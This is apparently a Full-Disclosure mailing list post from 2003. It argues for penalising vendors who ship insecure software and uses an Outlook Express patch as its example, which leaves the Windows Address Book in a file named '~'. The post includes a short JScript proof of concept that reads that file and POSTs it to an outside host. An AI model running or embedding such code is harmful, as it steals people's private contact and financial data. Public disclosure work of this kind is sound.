<!--
What I would like to see
created is an organization that would promote and protect the interests
of security researchers, plain and simple. There is currently no
organization that exists solely to guide, help and represent security
researchers on a larger scale, yet we can all recognize the need.
-->
I don't think those capable of actually doing research require hand holding by anyone.
<!--
We are a wide, international and differing group of researchers, some
with malicious and others with altruistic intents for finding security
vulnerabilities. Despite our differences we have much in common - we are
deeply interested in advancing our knowledge of security and information
technology, we find vulnerabilities, we want the vendor to know about
these at some point in time and we want to be accredited for our
findings.
-->
Can this not already be achieved by following the minimum requirement of any one
particular vendor. Or following any one of the number of so-called disclosure
guidelines already tabled.
While some may want accreditation and pat on the back, others may want the continual
flow of effluent onto the internet to cease. Some want habitual offenders penalised.
Monetarily. Some want an authoritative body like a UL or CSA or VDE or SEMKO or BS to
stamp their mark on product entering the internet. 'REJECTED' for junk product that
finds it's way repeatedly onto the internet.
Allow me to give you an example of a habitual offender:
There is a peculiar file that appears on almost everyone's computers since April of
2003. Peculiar enough in that all it is, is a tilde "~". Inside that file is the
entire contents of the user's address book. In fact, the file is exactly that. The
user's address book. Simply adding the extension of *.wab to it, opens up none other
than the Windows Address Book. All names, addresses and whatever critically private
information one puts in there. Some people even put their banking and credit card
details in there believe it or not.
This peculiar little file is an oddity created by the April 2003, Cumulative Patch for
Outlook Express (330994). Now seven months ago. A most useful file in that it is
created in a number of well known places including "C:". Knowing the file name and
location makes it quite easy to 'steal' this file and invade the privacy of the user
of the computer where it still resides today. Some seven months after the vendor
knowing full well about it. [I believe there is a pending lawsuit against the same
vendor along the same lines at this time].
You see:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "file:///C:/~",0);
x.Send();
var y = new ActiveXObject ("Microsoft.XMLHTTP");
y.Open("POST", "http://www.malware.com/forthetaking.php";, false);
y.Send(x.responseBody);
Will get and post that file. With a little bit of effort and timing, all one needs to
do is steal that file and invade the privacy of the "customer" ! And who's fault will
that be? Mine for providing this glaringly obvious scenario 'for free' or the vendor
sitting on their hands for seven months thinking about it for a fee.
REJECT ! the product and keep it off the internet !
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
